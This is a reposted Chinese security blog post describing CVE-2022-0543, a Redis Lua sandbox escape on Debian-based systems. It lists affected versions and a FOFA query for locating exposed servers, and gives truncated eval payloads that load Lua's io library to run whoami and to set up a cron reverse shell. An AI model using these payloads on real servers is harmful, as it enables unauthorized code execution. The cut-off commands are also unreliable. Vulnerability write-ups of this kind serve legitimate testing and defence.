-CVE-2022-0543 Redis Lua沙盒绕过命令执行-安全小天地

本文转载于公众号：融云攻防实验室，原文地址：
漏洞复现-CVE-2022-0543 Redis Lua沙盒绕过命令执行

0x01 阅读须知

资源来源于网络，安全小天地只是再次进行分享，使用请遵循本站的免责申明

0x02 漏洞描述

Redis是一个广泛使用的缓存服务，但它也被用作消息代理。Redis嵌入了Lua编程语言作为其脚本引擎，可通过eval命令使用。Lua引擎应该是沙盒化的，即客户端可以与Lua中的RedisAPI交互，但不能在运行Redis的机器上执行任意代码。

在Debian、Ubuntu或其他基于Debian的LinuxLinux发行版系统上，由于打包问题，Redis在Lua解析器初始化后，package变量没有被正确清除，能够执行任意Lua脚本的远程攻击者可以实现Lua沙盒逃逸并在主机上执行任意代码。

0x03 漏洞复现

漏洞影响:

Debian Redis（buster）：5:5.0.14-1+deb10u2
Debian Redis（bullseye）：5:6.0.16-1+deb11u2
Debian Redis（unstable)：5:6.0.16-2
Ubuntu 21.10 Redis：5:6.0.15-1ubuntu0.1
Ubuntu 20.04 Redis：5:5.0.7-2ubuntu0.1

FOFA: app=”redis“

1.执行whoami命令

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l()

2.执行计划任务反弹shell

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");local io = io_l();local

(注：要在正规授权情况下测试网站：日站不规范，亲人泪两行)

安全小天地的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。安全小天地拥有对此文章的修改、删除和解释权限，如转载或传播此文章，需保证文章的完整性，未经允许，禁止转载！本文所提供的工具仅用于学习，禁止用于其他，请在24小时内删除工具文件！！！访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客，即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail：anquanclub@foxmail.com

THE END